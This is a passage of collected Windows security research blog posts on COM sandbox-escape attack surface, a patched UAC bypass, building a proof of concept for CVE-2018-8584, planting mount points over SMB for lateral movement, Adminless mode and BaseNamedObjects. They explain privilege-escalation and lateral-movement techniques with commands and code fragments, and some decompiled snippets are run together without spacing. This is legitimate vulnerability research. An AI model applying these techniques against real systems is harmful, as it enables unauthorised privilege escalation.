PS C:\> Get-ComDatabase .\com.db -SetCurrent

You'll find this is significantly faster. Worth noting, if you open a 64 bit PS command line you'll capture a database of the 64 bit view of COM, where as in 32 bit PS you'll get a 32 bit view. 

Finding Interactive User COM Servers


With the database loaded we can now query the database for COM registration information. You can get a handle to the underlying database object  as the variable $comdb using the following command:

PS C:\> $comdb = Get-CurrentComDatabase

However, I wouldn't recommend using the COM database directly as it's not really designed for ease of use. Instead I provide various cmdlets to extract information from the database which I've summarised in the following table:


Command
Description
Get-ComClass
Get list of registered COM classes
Get-ComInterface
Get list of registered COM interfaces
Get-ComAppId
Get list of registered COM AppIDs
Get-ComCategory
Get list of registered COM categories
Get-ComRuntimeClass
Get list of Windows Runtime classes
Get-ComRuntimeServer
Get list of Windows Runtime servers

Each command defaults to returning all registered objects from the database. They also take a range of parameters to filter the output to a collection or a single entry. I'd recommend passing the name of the command to Get-Help to see descriptions of the parameters and examples of use.

Why didn't I expose it as a relational database, say using SQL? The database is really an object collection and one thing PS is good at is interacting with objects. You can use the Where-Object command to filter objects, or Select-Object to extract certain properties and so on. Therefore it's probably a lot more work to build on a native query syntax that just let you write PS scripts to filter, sort and group. To make life easier I have spent some time trying to link objects together, so for example each COM class object has an AppIdEntry property which links to the object for the AppID (if registered). In turn the AppID entry has a ClassEntries property which will then tell you all classes registered with that AppID.

Okay, let's get a list of classes that are registered with RunAs set to "Interactive User". The class object returned from Get-ComClass has a RunAs property which is set to the name of the user account that the COM server runs as. You also need to only look for COM servers which run out of process, we can do this by filtering for only LocalServer32 classes.

Run the following command to do the filtering:

PS C:\> $runas = Get-GetComClass -ServerType LocalServer32 | ? RunAs -eq "Interactive User"

You should now find the $runas variable contains a list of classes which will run as IU. If you don't believe me you can double check by just selecting out the RunAs property (the default table view won't show it) using the following:

PS C:\> $runas | Select Name, RunAs

Name                  RunAs
----                  -----
BrowserBroker Class   Interactive User
User Notification     Interactive User
...

On my machine I have around 200 classes installed that will run as IU. But that's not the end of the story, only a subset of these classes will actually be accessible from a sandbox such as Edge or cross-session. We need a way of filtering them down further. To filter we'll need to look at the associated security of the class registration, specifically the Launch and Access permissions. In order to launch the new object and get an instance of the class we'll need to be granted Launch Permission, then in order to access the object we get back we'll need to be granted Access Permissions. The class object exposes this as the LaunchPermission and AccessPermission properties respectively. However, these just contain a Security Descriptor Definition Language (SDDL) string representation of the security descriptor, which isn't easy to understand at the best of times. Fortunately I've made it easier, you can use the Select-ComAccess cmdlet to filter on classes which can be accessed from certain scenarios.

Let's first look at what objects we could access from the Edge content sandbox. First we need the access token of a sandboxed Edge process. The easiest way to get that is just to start Edge and open the token from one of the MicrosoftEdgeCP processes. Start Edge, then run the following to dump a list of the content processes.

PS C:\> Get-Process MicrosoftEdgeCP | Select Id, ProcessName

   Id ProcessName
   -- -----------
 8872 MicrosoftEdgeCP
 9156 MicrosoftEdgeCP
10040 MicrosoftEdgeCP
14856 MicrosoftEdgeCP

Just pick one of the PIDs, for this purpose it doesn't matter too much as all Edge CP's are more or less equivalent. Then pass the PID to the -ProcessId parameter for Select-ComAccess and pipe in the $runas variable we got from before.

PS C:\> $runas | Select-ComAccess -ProcessId 8872 | Select Name

Name
----
PerAppRuntimeBroker
...

On my system, that reduces the count of classes from 200 to 9 classes, which is a pretty significant reduction. If I rerun this command with a normal UWP sandboxed process (such as the calculator) that rises to 45 classes. Still fewer than 200 but a significantly larger attack surface. The reason for the reduction is Edge content processes use Low Privilege AppContainer (LPAC) which heavily cuts down inadvertent attack surface. 

What about cross-session? The distinction here is you'll be running as one unsandboxed user account and would like to attack the another user account. This is quite important for the security of COM objects, the default access security descriptor uses the special SELF SID which is replaced by the user account of the process hosting the COM server. Of course if the server is running as a different user in a different session the defaults won't grant access. You can see the default security descriptor using the following command:

Show-ComSecurityDescriptor -Default -ShowAccess

This command results in a GUI being displayed with the default access security descriptor. You see in this screenshot that the first entry grants access to the SELF SID.

Default COM access security showing NT AUTHORITY\SELF

To test for accessible COM classes we just need to tell the access checking code to replace the SELF SID with another SID we're not granted access to. You can do this by passing a SID to the -Principal parameter. The SID can be anything as long as it's not our user account or one of the groups we have in our access token. Try running the following command:

PS C:\> $runas | Select-ComAccess -Principal S-1-2-3-4 | Select Name

Name
----
BrowserBroker Class
...

On my system that leaves around 54 classes, still a reduction from 200 but better than nothing and still gives plenty of attack surface.

Inspecting COM Objects


I've only shown you how to find potential targets to look at for sandbox escape or cross-session attacks. But the class still needs some sort of way of elevating privileges, such as a method on an interface which would execute an arbitrary executable or similar. Let's quickly look at some of the functions in the PS module which can help you to find this functionality. We'll use the example of the HxHelpPane class I abused previously (and is now fixed as a cross-session attack in Project Zero Issue 1224, probably).

The first thing is just to get a reference to the class object for the HxHelpPane server class. We can get the class using the following command:

PS C:\> $cls = Get-ComClass -Name "AP Client HxHelpPaneServer Class"

The $cls variable should now be a reference to the class object. First thing to do is find out what interfaces the class supports. In order to access a COM object OOP you need a registered COM proxy. We can use the list of registered proxy interfaces to find what the object responds to. Again I have command to do just that, Get-ComClassInterface. Run the following command to get back a list of interface objects:

PS C:\> Get-ComClassInterface $cls | Select Name, Iid

Name              Iid
----              ---
IMarshal          00000003-0000-0000-c000-000000000046
IUnknown          00000000-0000-0000-c000-000000000046
IMultiQI          00000020-0000-0000-c000-000000000046
IClientSecurity   0000013d-0000-0000-c000-000000000046
IHxHelpPaneServer 8cec592c-07a1-11d9-b15e-000d56bfe6ee

Sometimes there's interesting interfaces on the factory object as well, you can get the list of interfaces for that by specifying the -Factory parameter to Get-ComClassInterface. Of the interfaces shown only IHxHelpServer is unique to this class, the rest are standard COM interfaces. That's not to say they won't have interesting behavior but it wouldn't be the first place I'd look for interesting methods.

The implementation of these interfaces are likely to be in the COM server binary, where is that? We can just inspect the DefaultServer property on the class object.

PS C:\> $cls.DefaultServer
C:\Windows\helppane.exe

We can now just break out IDA and go to town? Not so fast, it'd be useful to know exactly what we're dealing with before then. At this point I'd recommend at least using my tools NDR parsing code to extract how the interface is structured. You can do this by pass an interface object from Get-ComClassInterface or just normal Get-ComInterface into the Get-ComProxy command. Unfortunately if you do this you'll find a problem:

PS C:\> Get-ComInterface -Name IHxHelpPaneServer | Get-ComProxy
Exception: "Error while parsing NDR structures"
At OleViewDotNet.psm1:1587 char:17
+ [OleViewDotNet.COMProxyInterfaceInstance]::GetFromIID($In
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) []
    + FullyQualifiedErrorId : NdrParserException

This could be bug in my code, but there's a more likely reason. The proxy could be an auto-created proxy from a type library. We can check that using the following:

PS C:\> Get-ComInterface -Name IHxHelpPaneServer

Name                 IID             HasProxy   HasTypeLib
----                 ---             --------   ----------
IHxHelpPaneServer    8cec592c-07a1... True       True

We can see if the output that the interface has a registered type library, for an interface this likely means its proxy is auto-generated. Where's the type library? Again we can use another database command, Get-ComTypeLib and pass it the IID of the interface:

PS C:\> Get-ComTypeLib -Iid 8cec592c-07a1-11d9-b15e-000d56bfe6ee

TypelibId  : 8cec5860-07a1-11d9-b15e-000d56bfe6ee
Version    : 1.0
Name       : AP Client 1.0 Type Library
Win32Path  : C:\Windows\HelpPane.exe
Win64Path  : C:\Windows\HelpPane.exe
Locale     : 0
NativePath : C:\Windows\HelpPane.exe

Now you can use your favourite tool to decompile the type library to get back your interface information. You can also use the following command if you capture the type library information to the variable $tlb:

PS C:\> Get-ComTypeLibAssembly $tlb | Format-ComTypeLib
...
[Guid("8cec592c-07a1-11d9-b15e-000d56bfe6ee")]
interface IHxHelpPaneServer
{
   /* Methods */
   void DisplayTask(string bstrUrl);
   void DisplayContents(string bstrUrl);
   void DisplaySearchResults(string bstrSearchQuery);
   void Execute(string pcUrl);
}

You now know the likely names of functions which should aid you in looking them up in IDA or similar. That's the end of this quick tutorial, there's plenty more to discover in the PS module you'll just have to poke around at it and see. Happy hunting.


Farewell to the Token Stealing UAC Bypass

$
0
0
With the release of Windows 10 RS5 the generic UAC bypass I documented in "Reading Your Way Around UAC" (parts 1, 2 and 3) has been fixed. This quick blog post will describe the relatively simple change MS made to the kernel to fix the UAC bypass and some musing on how it still might be possible to bypass.

As a quick recap, the UAC bypass I documented allowed any normal user on the same desktop to open a privileged UAC admin process and get a handle to the process' access token. The only requirement was there was an existing elevated process running on the desktop, but that's a very common behavior. That in itself didn't allow you to do much directly. However by duplicating the token which, made it writable, it was possible to selectively downgrade the token so that it could be impersonated.

Prior to Windows 10 all you needed to do was downgrade the token's integrity level to Medium. This left the token still containing the Administrators group, but it passed the kernel's checks for impersonation. This allows you to directly modify administrator only resources. For Windows 10 an elevation check was introduced which prevented a process in a non-elevated session from impersonating an elevated token. This was indicated by a flag in the limited token's logon session structure. If the flag was set, but you were impersonating an elevated token it'd fail. This didn't stop you from impersonating the token as long as it was considered non-elevated then abusing WMI to spawn a process in that session or the Secondary Logon Service to get back administrator privileges.

Let's look now at how it was fixed. The changed code is in the SeTokenCanImpersonate method which determines whether a token is allowed to impersonated or not.

TOKEN*process_token=...;TOKEN*imp_token=...;#define LIMITED_LOGON_SESSION 0x4 if(SeTokenIsElevated(imp_token)){if(!SeTokenIsElevated(process_token)&&(process_token->LogonSession->Flags&LIMITED_LOGON_SESSION)){returnSTATUS_PRIVILEGE_NOT_HELD;}}if(process_token->LogonSession->Flags&LIMITED_LOGON_SESSION&&!(imp_token->LogonSession->Flags&LIMITED_LOGON_SESSION)){SepLogUnmatchedSessionFlagImpersonationAttempt();returnSTATUS_PRIVILEGE_NOT_HELD;}

The first part of the code is the same as was introduced in Windows 10. If you try and impersonate an elevated token and your process is running in the limited logon session it'll be rejected. The new check introduced ensures that if you're in the limited logon session you're not trying to impersonate a token in a non-limited logon session. And there goes the UAC bypass, using any variation of the attack you need to impersonate the token to elevate your privileges.

The fix is pretty simple, although I can't help think there must be some edge case which this would trip up. The only case which comes to mind in tokens returned from the LogonUser APIs, however those are special cases earlier in the function so I could imagine this would only be a problem when there might be a more significant security bug.

It's worth bearing in mind that due to the way Microsoft fixes bugs in UAC this will not be ported to versions prior to RS5. So if you're on a Windows Vista through Windows 10 RS4 machine you can still abuse this to bypass UAC, in most cases silently. And there's hardly a lack of other UAC bypasses, you just have to look at UACME. Though I'll admit none of the bypasses are as interesting to me as a fundamental design flaw in the whole technology. The only thing I can say is Microsoft seems committed to fixing these bugs eventually, even if they seem to introduce more UAC bypasses in each release.

Can this fix be bypassed? It's predicated on the user not having control over a process running outside of the limited logon session. A potential counter example would be processes spawned from an elevated process where the token is intentionally restricted, such as in sandboxed applications such as Adobe Reader or Chrome. However in order for that to be exploitable you'd need to convince the user to elevate those applications which doesn't make for a general technique. There's of course potential impersonation bugs, such as my Constrained Impersonation attack which could be used to bypass Over-The-Shoulder elevation but also could be used to impersonate SYSTEM tokens. Bugs like that tend to be something Microsoft want to fix (the Constrained Impersonation one was fixed as CVE-2018-0821) so again not a general technique.

I did have a quick think about other ways of bypassing this, then I realized I don't actually care ;-)

Finding Windows RPC Client Implementations Through Brute Force

$
0
0
Recently, @SandboxEscaper wrote a detailed blog post (link) about reverse engineering local RPC servers for the purposes of discovering sandbox escapes and privilege escalation vulnerabilities. After reading I thought I should put together a sort-of companion piece on RPC client implementation for PoC writing, specifically not implementing one unless you really need to.

If you go and read the blog post it goes through finding an RPC service to investigate using RpcView, then using the tool to decompile the RPC interface to an IDL file which can be added to a C++ project. This has a few problems when you're dealing with an unknown RPC interface:

  • Even if the decompiler was perfect (and RpcView or my own in my NtObjectManager PowerShell module are definitely not) the original IDL to NDR compilation process is lossy. Reversing this process with a decompiler doesn't always produce a 100% correct IDL file and thus the regenerated NDR might not be 100% compatible.
  • The NDR engine is terrible at giving useful diagnostic information for why the IDL is incorrect, usually just returning error code 1783 "The stub received bad data". This is made even more painful when dealing with complex structures or unions which must be exactly correct otherwise it all goes to hell.
  • It's hard to use the IDL from any language but C/C++, as that's really the only supported output format for RPC interfaces.
While all three of these problems are annoying when trying to produce a working PoC, the last one annoys me especially. I have a thing about writing my PoCs in C#, about the only exception to using C# is when I need to interact with an RPC server. There's plenty of ways around this, for example I could build the client into a native DLL and export methods to call from C#, but this feel unsatisfactory. 

At least in some cases, Microsoft have already done most of the work for me. If there's a native RPC server on a default installation of Windows there must be some sort of client component. In some cases this client might be embedded completely inside a binary and not directly callable, COM is a good example. However in other cases the developers also provide a general purpose library to interact with the server. If you can find the client library, it'll bring a number of advantages:
  • If it's a truly general purpose the library will export methods which can be easily interacted with from C# using P/Invoke (or any other language which can invoke native exports).
  • The majority of these libraries will deal with setting up the RPC client connection, dealing with asynchronous calls and custom serialization requirements.
  • The NDR client code is going to be 100% compatible with the server, which should eliminate error code 1783 as well as dealing with changes to parameters, method layout and interface IDs which can happen between major versions of the OS. 
  • You only have to deal with calling a C style method (or sometimes a COM interface, but that's still a C calling convention) which gives a bit more flexibility which it comes to getting structure definitions correct.
  • As it's a library there's a chance that useful type information might be disclosed in the client code, or it will allow to to track down callers of these APIs in other binaries that you can RE to get a better idea of how to call the methods correctly.
There's sadly some disadvantages to this approach:
  • Not all clients will actually be in a general purpose library with easy entry points, or at least the entry points don't cleanly map to the underlying RPC methods. That's not to say it's useless as you could load the DLL then use a relative pointer to the RPC client structures and manually reconstruct the call but that removes many of the advantages.
  • The library might be general purpose but the developers added a significant amount of client side parameter verification or don't expose some parameters at all. Some bugs are only going to present themselves by calling the RPC method with parameters the developers didn't expect to receive, perhaps because they verify in the client.
To prevent this blog post getting even longer let's look how I could identify the client library for the Data Sharing Service which SandboxEscaper dropped a bug in that was recently fixed as CVE-2018-8584. The bug SandboxEscaper discovered was in the method PolicyChecker::CheckFilePermission implemented in dssvc.dll. By calling one of the RPC methods, such as RpcDSSMoveFromSharedFile an arbitrary file can be deleted by the SYSTEM user. Looking at dssvc.dll it doesn't contain any client code, so we have to go hunting for the client. For this we'll use my NtObjectManager PowerShell module as it contains code to do just this. Any lines which start with PS> are to be executed in PowerShell.

Step 1: Install the NtObjectManager module from the PowerShell gallery.

PS> Install-Module NtObjectManager -Scope CurrentUser
PS> Import-Module NtObjectManager

You might need to also disable the script execution policy for this to work successfully.

Step 2: Parse RPC interfaces in all system DLLs using Get-RpcServer cmdlet.

PS> $rpc = ls c:\windows\system32\*.dll | Get-RpcServer -ParseClients

This call passes the list of all DLLs in system32 to the Get-RpcServer command and specifies that it should also parse all clients. This command does a heuristic search in a DLL's data sections for RPC servers and clients and parses the NDR structures. You can use this to generate RPC server definitions similar to RpcView (but in my own weird C# pseudo-code syntax) but for this scenario we only care about the clients. My code does have some advantages, for example the parsed NDR data is stored as a .NET object so you can do better analysis of the interface, but that's something for another day.

Step 3: Filter out the client based on IID and Client status.

PS> $rpc | ? {$_.Client -and $_.InterfaceId -eq 'bf4dc912-e52f-4904-8ebe-9317c1bdd497'} | Select FilePath

The server's IID is bf4dc912-e52f-4904-8ebe-9317c1bdd497 which you can easily get from the IDL server definition in the uuid attribute. We also need to filter only client implementations using the Client property. 

If you've followed these procedures you'll find that the client implementation is in the DLL dsclient.dll. Admittedly we might have been able to guess this based on the similarity of names, but it's not always so simple. 

Step 4: Disassemble/RE the library to find out how to call the methods.


It doesn't mean the DLL contains a general purpose library, we'll still need to open it in a disassembler and take a look. In this case we're lucky, if we look at the exports for the dsclient.dll library we find the names match up with the server. For example there's a DSMoveFromSharedFile which would presumably match up with RpcDSSMoveFromSharedFile.


Decompilation of DSMoveFromSharedFile


If you follow this code you'll find it's just a simple wrapper around a call to the method DSCMoveFromSharedFile which binds to the RPC endpoint and calls the server. There's no parameter verification taking place so we can just determine how we can call this method from C# using the server IDL we generated earlier. 

And that's it, I was able to implement a PoC for CVE-2018-8584 by defining the following C# P/Invoke method:

[DllImport("dsclient.dll", CharSet = CharSet.Unicode)]
public static extern int DSMoveFromSharedFile(string token, string source_file);

Of course your mileage may vary depending on your RPC server. But what I've described here is a quick and easy way to determine if there's a quick and easy way to avoid writing C++ code :-)





Abusing Mount Points over the SMB Protocol

$
0
0
This blog post is a quick writeup on an interesting feature of SMBv2 which might have uses for lateral movement and red-teamers. When I last spent significant time looking at symbolic link attacks on Windows I took a close look at the SMB server. Since version 2 the SMB protocol has support for symbolic links, specifically the NTFS Reparse Point format. If the SMB server encounters an NTFS symbolic link within a share it'll extract the REPARSE_DATA_BUFFER and return it to the client based on the SMBv2 protocol specification§2.2.2.2.1.

Screenshot of symbolic link error response from SMB specifications.

The client OS is responsible for parsing the REPARSE_DATA_BUFFER and following it locally. This means that only files the client can already access can be referenced by symbolic links. In fact even resolving symbolic links locally isn't enabled by default, although I did find a bypass which allowed a malicious server to bypass the client policy and allowing resolving symbolic links locally. Microsoft declined to fix the bypass at the time, it's issue 138 if you're interested.

What I found interesting is while IO_REPARSE_TAG_SYMLINK is handled specially on the client, if the server encounters the IO_REPARSE_TAG_MOUNT_POINT reparse point it would follow it on the server. Therefore, if you could introduce a mount point within a share you could access any fixed disk on the server, even if it's not shared directly. That could have many uses for lateral movement, but the question becomes how could we add a mount point without already having local access to the disk?

First thing to try is to just create a mount point via a UNC path and see what happens. Using the MKLINK CMD built-in you get the following:

Using mklink on \\localhost\c$\abc returns the error "Local NTFS volumes are required to complete the operation."

The error would indicate that setting mount points on remote servers isn't supported. This would make some sense, setting a mount point on a remote drive would result in unexpected consequences. You'd assume the protocol either doesn't support setting reparse points at all, or at least restricts them to only allowing symbolic links. We can get a rough idea what the protocol expects by looking up the details in the protocol specification. Setting a reparse point requires sending the FSCTL_SET_REPARSE_POINT IO control code to a file, therefore we can look up the section on the SMB2 IOCTL command to see if any there's any information about the control code.

After a bit of digging you'll find that FSCTL_SET_REPARSE_POINT is indeed supported and there's a note in §3.3.5.15.13 which I've reproduced below.

"When the server receives a request that contains an SMB2 header with a Command value equal to SMB2 IOCTL and a CtlCode of FSCTL_SET_REPARSE_POINT, message handling proceeds as follows:
If the ReparseTag field in FSCTL_SET_REPARSE_POINT, as specified in [MS-FSCC] section 2.3.65, is not IO_REPARSE_TAG_SYMLINK, the server SHOULD verify that the caller has the required permissions to execute this FSCTL.<330> If the caller does not have the required permissions, the server MUST fail the call with an error code of STATUS_ACCESS_DENIED."330>
The text in the specification seems to imply the server only needs to check explicitly for IO_REPARSE_TAG_SYMLINK, and if the tag is something different it should do some sort of check to see if it's allowed, but it doesn't say anything about setting a different tag to be explicitly banned. Perhaps it's just the MKLINK built-in which doesn't handle this scenario? Let's try the CreateMountPoint tool from my symboliclink-testing-tools project and see if that helps.

Using CreateMountPoint on \\localhost\c$\abc gives access denied.

CreateMountPoint doesn't show an error about only supporting local NTFS volumes, but it does return an access denied error. This ties in with the description §3.3.5.15.13, if the implied check fails the code should return access denied. Of course the protocol specification doesn't actually say what check should be performed, I guess it's time to break out the disassembler and look at the implementation in the SMBv2 driver, srv2.sys.

I used IDA to look for immediate values for IO_REPARSE_TAG_SYMLINK which is 0xA000000C. It seems likely that any check would first look for that value along with any other checking for the other tags. In the driver from Windows 10 1809 there was only one hit in Smb2ValidateIoctl. The code is roughly as follows:

NTSTATUSSmb2ValidateIoctl(SmbIoctlRequest*request){// ... switch(request->IoControlCode){caseFSCTL_SET_REPARSE_POINT:REPARSE_DATA_BUFFER*reparse=(REPARSE_DATA_BUFFER*)request->Buffer;
// Validate length etc. if(reparse->ReparseTag!=IO_REPARSE_TAG_SYMLINK&&
!request->SomeOffset->SomeByteValue){
returnSTATUS_ACCESS_DENIED;}// Complete FSCTL_SET_REPARSE_POINT request. }}

The code extracts the data from the IOCTL request, it fails with STATUS_ACCESS_DENIED if the tag is not IO_REPARSE_TAG_SYMLINK and some byte value is 0 which is referenced from the request data. Tracking down who sets this value can be tricky sometimes, however I usually have good results by just searching for the variables offset as an immediate value in IDA, in this case 0x200 and just go through the results looking for likely MOV instructions. I found an instruction "MOV [RCX+0x200], AL" inside Smb2ExecuteSessionSetupReal which looked to be the one. The variable is being set with the result of the call to Smb2IsAdmin which just checks if the caller has the BUILTIN\Administrators group in their token. It seems that we can set arbitrary reparse points on a remote share, as long as we're an administrator on the machine. We should still test that's really the case:

Using CreateMountPoint on \\localhost\c$\abc is successful and listing the directory showing the windows folder.


Testing from an administrator account allows us to create the mount point, and when listing the directory from a UNC path the Windows folder is shown. While I've demonstrated this on local admin shares this will work on any share and the mount point is followed on the remote server.

Is this trick useful? Requiring administrator access does mean it's not something you could abuse for local privilege escalation and if you have administrator access remotely there's almost certainly nastier things you could do. Still it could be useful if the target machine has the admin shares disabled, or there's monitoring in place which would detect the use of ADMIN$ or C$ in lateral movement as if there's any other writable share you could add a new directory which would give full control over any other fixed drive.

I can't find anyone documenting this before, but I could have missed it as the search results are heavily biased towards SAMBA configurations when you search for SMB and mount points (for obvious reasons). This trick is another example of ensuring you test any assumptions about the security behavior of a system as it's probably not documented what the actual behavior is. Even though a tool such as MKLINK claims a lack of a support for setting remote mount points by digging into available specification and looking at the code itself you can find some interesting stuff.




Enabling Adminless Mode on Windows 10 SMode

$
0
0
Microsoft has always been pretty terrible at documenting new and interesting features for their System Integrity Policy used to enable security features like UMCI, Device Guard/Windows Defender Application Control etc. This short blog post is about another feature which seems to be totally undocumented*, but is available in Windows 10 since 1803, Adminless mode.

* No doubt Alex Ionescu will correct me on this point if I'm wrong.

TL;DR; Windows 10 SMode has an Adminless mode which fails any access check which relies on the BUILTIN\Administrators group. This is somewhat similar to macOS's System Integrity Protection in that the Administrator user cannot easily modify system resources. You can enable it by setting the DWORD value SeAdminlessEnforcementModeEnabled in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel to 1 on Windows 10 1809 SMode. I'd not recommend setting this value on a working SMode system as you might lock yourself out of the computer.

If you look at the kernel 1803 and above at the API SeAccessCheck (and similar) you'll see it now calls the method SeAccessCheckWithHintWithAdminlessChecks. The Adminless part is new, but what is Adminless and how is it enabled? Let's see some code, this is derived from 1809 [complexity reduced for clarity]:

BOOLEANSeAccessCheck(PSECURITY_DESCRIPTORSecurityDescriptor,PSECURITY_SUBJECT_CONTEXTSubjectSecurityContext,BOOLEANSubjectContextLocked,ACCESS_MASKDesiredAccess,ACCESS_MASKPreviouslyGrantedAccess,PPRIVILEGE_SET*Privileges,PGENERIC_MAPPINGGenericMapping,KPROCESSOR_MODEAccessMode,PACCESS_MASKGrantedAccess,PNTSTATUSAccessStatus){BOOLEANAdminlessCheck=FALSE;PTOKENToken=SeQuerySubjectContextToken(SubjectSecurityContext);DWORDFlags;BOOLEANResultSeCodeIntegrityQueryPolicyInformation(205,&Flags,sizeof(Flags));if(Flags&0xA0000000){AdminlessCheck=SeTokenIsAdmin(Token)&&!RtlEqualSid(SeLocalSystemSid,Token->UserAndGroups-&gt;Sid);
}if(AdminlessCheck){Result=SeAccessCheckWithHintWithAdminlessChecks(...,GrantedAccess,AccessStatus,TRUE);if(Result){returnTRUE;}if(SepAccessStatusHasAccessDenied(GrantedAccess,AccessStatus)
&&SeAdminlessEnforcementModeEnabled){SepLogAdminlessAccessFailure(...);returnFALSE;}}returnSeAccessCheckWithHintWithAdminlessChecks(...,FALSE);}

The code has three main parts. First a call is made to SeCodeIntegrityQueryPolicyInformation to look up system information class 205 from the CI module. Normally these information classes are also accessible through NtQuerySystemInformation, however 205 is not actually wired up in 1809 therefore you can't query the flags from user-mode directly. If the flags returned have the bits 31 or 29 set, then the code tries to determine if the token being used for the access check is an admin (it the token a member of the the BUILTIN\Administrators group) and it's not a SYSTEM token based on the user SID.

If this token is not an admin, or it's a SYSTEM token then the second block is skipped. The SeAccessCheckWithHintWithAdminlessChecks method is called with the access check arguments and a final argument of FALSE and the result returned. This is the normal control flow for the access check. If the second block is instead entered SeAccessCheckWithHintWithAdminlessChecks is called with the final argument set to TRUE. This final argument is what determines whether Adminless checks are enabled or not, but not whether the checks are enforced. We'll see what the checks are are in a minute, but first let's continue here. Finally in this block SepAccessStatusHasAccessDenied is called which takes the granted access and the  NTSTATUS code from the check and determines whether the access check failed with access denied. If the global variable SeAdminlessEnforcementModeEnabled is also TRUE then the code will log an optional ETW event and return FALSE indicating the check has failed. If Adminless mode is not enabled the normal non Adminless check is made.

There's two immediate questions you might ask, first where do the CI flags get set and how do you set SeAdminlessEnforcementModeEnabled to TRUE? The latter is easy, by creating a DWORD registry value set to 1 in "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel" with the name AdminlessEnforcementModeEnabled the kernel will set that global variable to TRUE. The CI flags is slightly more complicated, the call to SeCodeIntegrityQueryPolicyInformation drills down to SIPolicyQueryWindowsLockdownMode inside the CI module. Which looks like the following:

voidSIPolicyQueryWindowsLockdownMode(PULONGLockdownMode){SIPolicyHandlePolicy;if(SIPolicyIsPolicyActive(7,&Policy)){ULONGOptions;SIPolicyGetOptions(Policy,&Options,NULL);if((Options>>6)&1)*LockdownMode|=0x80000000;else*LockdownMode|=0x20000000;}else{*LockdownMode|=0x40000000;}}

The code queries whether policy 7 is active. Policy 7 corresponds to the system integrity policy file loaded from WinSIPolicy.p7b (see g_SiPolicyTypeInfo in the CI module) which is the policy file used by SMode (what used to be Windows 10S). If 7 is active then the depending on an additional option flag either bit 31 or bit 29 is set in the LockdownMode parameter. If policy 7 is not active then bit 30 is set. Therefore what the call in SeAccessCheck is checking for is basically whether the current system is running Windows in SMode. We can see this more clearly by looking at 1803 which has slightly different code:

if(!g_sModeChecked){SYSTEM_CODE_INTEGRITY_POLICYPolicy={};ZwQuerySystemInformation(SystemCodeIntegrityPolicyInformation,&Policy,sizeof(Policy));g_inSMode=Policy.Options&0xA0000000;g_sModeChecked=TRUE;}

The code in 1803 makes it clear that if bit 29 or 31 is set then it's consider to be SMode. This code also uses ZwQuerySystemInformation instead of SeCodeIntegrityQueryPolicyInformation to extract the flags via the SystemCodeIntegrityPolicyInformation information class. We can call this instead of information class 205 using NtObjectManager. We can see in the screenshot below that on a non-SMode system calling NtSystemInfo::CodeIntegrityPolicy has Flag40000000 set which would not be considered SMode.

Calling NtSystemInfo::CodeIntegrityPolicy in Powershell on a non-SMode system showing Flag40000000

In contrast on an SMode installation we can see Flag20000000 is set instead. This means it's ready to enable Adminless mode.

Calling NtSystemInfo::CodeIntegrityPolicy in Powershell on a SMode system showing Flag20000000

We now know how to enable Adminless mode, but what is the mode enforcing? The final parameter to SeAccessCheckWithHintWithAdminlessChecks is forwarded to other methods. For example the method SepSidInTokenSidHash has been changed. This method checks whether a specific SID is in the list of a token's group SIDs. This is used for various purposes. For example when checking the DACL each ACE is enumerated and SepSidInTokenSidHash is called with the SID from the ACE and the token's group list. If the SID is in the group list the access check handles the ACE according to type and updates the current granted access. The change for Adminless looks like the following:

BOOLEANSepSidInTokenSidHash(PSID_AND_ATTRIBUTES_HASHSidAndHash,PSIDSid,BOOLEANAdminlessCheck){if(AdminlessCheck&&RtlEqualSid(SeAliasAdminsSid,Sid))returnFALSE;// ... returnTRUE;}

Basically if the AdminlessCheck argument is TRUE and the SID to check is BUILD\Administrators then fail immediately. This checks in repeated in a number of other places as well. The net result is Administrators (except for SYSTEM which is needed for system operation) can no longer access a resource based on being a member of the Administrators group. As far as I can tell it doesn't block privilege checks, so if you were able to run under a token with "GOD" privileges such as SeDebugPrivilege you could still do circumvent the OS security. However you need to be running with High Integrity to use the most dangerous privileges which you won't get as a normal user.

I don't really know what the use case for this mode is, at least it's not currently on by default on SMode. As it's not documented anywhere I could find then I assume it's also not something Microsoft are expecting users/admins to enable. The only thoughts I had were kiosk style systems or in Hyper-V containers to block all administrators access. If you were managing a fleet of SMode devices you could also enable this to make it harder for a user to run code as admin, however it wouldn't do much if you had a privilege escalation to SYSTEM.

This sounds similar in some ways to System Integrity Protection/SIP/rootless on macOS in that it limits the ability for a user modify the system except rather than a flag which indicates a resource can be modified like on macOS and administrator could still modify a resource as long as they have another group to use. Perhaps eventually Microsoft might document this feature, considering the deep changes to access checking it required. Then again, knowing Microsoft, probably not.










A Brief History of BaseNamedObjects on Windows NT

$
0
0
Recently I RE'd some new undocumented feature in Windows which I thought I should put it in a short blog post. To expand it out slightly this blog will be a brief history of BaseNamedObjects (BNO from now on) from Windows NT 3.1 to modern Windows 10.

TL;DR; New versions of Windows 10 have a BaseNamedObjects isolation feature when creating a non-sandbox process which allows an application to redirect named objects transparently to a non-shared location. I've added support for the feature in NtObjectManager v1.1.19.

Just to get you up to speed, what is BNO? The majority of Windows NT kernel objects can be assigned names. The named objects are added to the Object Manager Namespace, a hierarchical object based file system. When calling a native system call such as NtCreateEvent you can specify an OBJECT_ATTRIBUTES structure which can include a full path to the object location. However, if you're calling a Win32 API it's typical to only be provided a simple name as demonstrated by the CreateEvent lpName parameter.

Screenshot showing CreateEventW prototype with an lpName parameter which specifies the object name.
As you can't provide a full path the question might be, where does the object get created? In NT 3.1 the kernel sets up a special \BaseNamedObjects directory when it starts. When you call CreateEvent the KERNEL32 library appends the name to the object directory to get the full path*. The end result is you create your named event at the location \BaseNamedObjects\{lpName}. We can use my NtObjectManager PowerShell module to list the BaseNamedObjects directory on a modern system by listing the drive NtObject:\BaseNamedObjects, as shown below.

* This isn't strictly how the library handles redirecting the name, but it's good enough for this post.

PowerShell console showing listing of ntobject:\BaseNamedObjects.

The BNO directory was shared by all users on the system, which for NT 3.1 meant system services and the user logged into the physical console. While there's some security implications with sharing this global location for all named events this wasn't a big concern back in 1993.

